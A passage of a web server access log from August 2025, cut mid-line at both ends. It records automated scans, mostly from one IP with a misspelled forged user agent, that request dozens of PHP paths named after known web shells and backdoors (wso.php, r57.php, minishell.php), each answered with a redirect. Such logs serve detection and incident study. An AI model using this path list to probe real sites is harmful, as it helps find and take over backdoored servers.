(Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:24:33 -0400] "GET /mi.php HTTP/1.1" 301 237 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:12:24:35 -0400] "GET /wp-content/themes/travel/issue.php HTTP/1.1" 301 269 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:24:46 -0400] "GET /min.php HTTP/1.1" 301 238 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:24:48 -0400] "GET /mini.php HTTP/1.1" 301 239 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:24:52 -0400] "GET /minik.php HTTP/1.1" 301 240 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:25:06 -0400] "GET /minishell.php HTTP/1.1" 301 244 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:25:09 -0400] "GET /mrjn.php HTTP/1.1" 301 239 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:25:14 -0400] "GET /n.php HTTP/1.1" 301 236 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:25:16 -0400] "GET /new-index.php HTTP/1.1" 301 244 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:25:22 -0400] "GET /ninja.php HTTP/1.1" 301 240 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:25:24 -0400] "GET /ohayo.php HTTP/1.1" 301 240 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:25:25 -0400] "GET /old-index.php?daksldlkdsadas=1 HTTP/1.1" 301 261 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:25:30 -0400] "GET /olux.php HTTP/1.1" 301 239 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:25:35 -0400] "GET /postfs.php HTTP/1.1" 301 241 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 149.102.237.37 - - [12/Aug/2025:12:25:41 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 209.38.125.40 - - [12/Aug/2025:12:25:41 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 149.22.91.139 - - [12/Aug/2025:12:25:41 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 156.146.41.214 - - [12/Aug/2025:12:25:41 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 128.199.106.124 - - [12/Aug/2025:12:25:41 -0400] "GET /pref.php HTTP/1.1" 301 239 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:25:46 -0400] "GET /priv.php HTTP/1.1" 301 239 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:25:47 -0400] "GET /priv8.php HTTP/1.1" 301 240 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:25:50 -0400] "GET /qindex.php HTTP/1.1" 301 241 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:25:57 -0400] "GET /r.php HTTP/1.1" 301 236 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:25:59 -0400] "GET /r57.php HTTP/1.1" 301 238 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:26:02 -0400] "GET /rex.php HTTP/1.1" 301 238 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:26:08 -0400] "GET /root.php HTTP/1.1" 301 239 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:26:08 -0400] "GET /s.php HTTP/1.1" 301 236 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:12:26:10 -0400] "GET /wso112233.php HTTP/1.1" 301 248 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:26:13 -0400] "GET /shell.php HTTP/1.1" 301 240 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:26:17 -0400] "GET /shell20211028.php HTTP/1.1" 301 248 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:26:20 -0400] "GET /shells.php HTTP/1.1" 301 241 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:26:23 -0400] "GET /sql.php HTTP/1.1" 301 238 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:26:24 -0400] "GET /srx.php HTTP/1.1" 301 238 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:26:27 -0400] "GET /sym.php HTTP/1.1" 301 238 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:26:29 -0400] "GET /sym403.php HTTP/1.1" 301 241 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:26:35 -0400] "GET /t.php HTTP/1.1" 301 236 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:26:42 -0400] "GET /tes.php HTTP/1.1" 301 238 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:26:43 -0400] "GET /tesla.php HTTP/1.1" 301 240 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:26:44 -0400] "GET /teslav.php HTTP/1.1" 301 241 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:12:26:49 -0400] "GET /epinyins.php HTTP/1.1" 301 247 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:26:52 -0400] "GET /test.php HTTP/1.1" 301 239 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:26:55 -0400] "GET /tshop.php HTTP/1.1" 301 240 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:26:59 -0400] "GET /twin.php HTTP/1.1" 301 239 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:27:01 -0400] "GET /u.php HTTP/1.1" 301 236 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:27:05 -0400] "GET /upload.php HTTP/1.1" 301 241 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:12:27:06 -0400] "GET /wp-content/plugins/wordpress-three/miin.php HTTP/1.1" 301 278 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:27:07 -0400] "GET /uploader.php HTTP/1.1" 301 243 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:27:09 -0400] "GET /usb.php HTTP/1.1" 301 238 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:27:09 -0400] "GET /usr.php HTTP/1.1" 301 238 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:27:13 -0400] "GET /utchiha.phP HTTP/1.1" 301 242 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:27:16 -0400] "GET /v3.php HTTP/1.1" 301 237 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:27:24 -0400] "GET /v4.php HTTP/1.1" 301 237 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:27:28 -0400] "GET /vuln.php HTTP/1.1" 301 239 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:27:33 -0400] "GET /w3llstore.php HTTP/1.1" 301 244 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:27:33 -0400] "GET /wp-2019.php HTTP/1.1" 301 242 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:27:34 -0400] "GET /wp-admin.php HTTP/1.1" 301 243 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:27:37 -0400] "GET /wp-content/mu-plugins-old/index.php HTTP/1.1" 301 266 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:27:37 -0400] "GET /wp-content/themes/twentytwentytwo/index.php HTTP/1.1" 301 274 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:27:42 -0400] "GET /wp-defaul.php HTTP/1.1" 301 244 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:27:42 -0400] "GET /wp-includes/fonts/dev.php HTTP/1.1" 301 256 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:27:43 -0400] "GET /wp-includes/fonts/iq.php HTTP/1.1" 301 255 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:27:48 -0400] "GET /wp-includes/fonts/iqb.php HTTP/1.1" 301 256 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:27:51 -0400] "GET /wp-info.php HTTP/1.1" 301 242 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:28:00 -0400] "GET /wp-mails.php HTTP/1.1" 301 243 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:28:06 -0400] "GET /wp-one.php HTTP/1.1" 301 241 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:28:09 -0400] "GET /wp-pluging.php HTTP/1.1" 301 245 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:28:10 -0400] "GET /wp-plugins.php HTTP/1.1" 301 245 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:28:11 -0400] "GET /wp-rss.php HTTP/1.1" 301 241 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:28:12 -0400] "GET /wp-singupp.php HTTP/1.1" 301 245 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:28:15 -0400] "GET /wp-site.php HTTP/1.1" 301 242 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:28:16 -0400] "GET /wp-system.php HTTP/1.1" 301 244 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:28:18 -0400] "GET /wp-title.php HTTP/1.1" 301 243 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:28:20 -0400] "GET /wp-we.php HTTP/1.1" 301 240 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:28:23 -0400] "GET /wp.php HTTP/1.1" 301 237 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:28:26 -0400] "GET /wp/wp-includes/fonts/dev.php HTTP/1.1" 301 259 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:28:28 -0400] "GET /wp/wp-includes/fonts/iqb.php HTTP/1.1" 301 259 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:28:33 -0400] "GET /wpindex.php HTTP/1.1" 301 242 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:28:37 -0400] "GET /ws.php HTTP/1.1" 301 237 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:28:37 -0400] "GET /wsanon.php HTTP/1.1" 301 241 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:28:42 -0400] "GET /WSO.php HTTP/1.1" 301 238 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:28:45 -0400] "GET /wso.php HTTP/1.1" 301 238 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:28:48 -0400] "GET /wso1.php HTTP/1.1" 301 239 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:28:52 -0400] "GET /wso1337.php HTTP/1.1" 301 242 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:12:28:53 -0400] "GET /wp-content/plugins/WordPressCore/include.php HTTP/1.1" 301 279 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:28:53 -0400] "GET /wso2.php HTTP/1.1" 301 239 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:28:56 -0400] "GET /xcv.php HTTP/1.1" 301 238 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:28:57 -0400] "GET /xidcm.php HTTP/1.1" 301 240 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:29:05 -0400] "GET /xindex.php HTTP/1.1" 301 241 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:29:07 -0400] "GET /xleet.php HTTP/1.1" 301 240 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:29:14 -0400] "GET /xm.php HTTP/1.1" 301 237 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 206.189.247.132 - - [12/Aug/2025:12:29:16 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 68.183.245.101 - - [12/Aug/2025:12:29:16 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 144.126.240.247 - - [12/Aug/2025:12:29:16 -0400] "GET /send.php 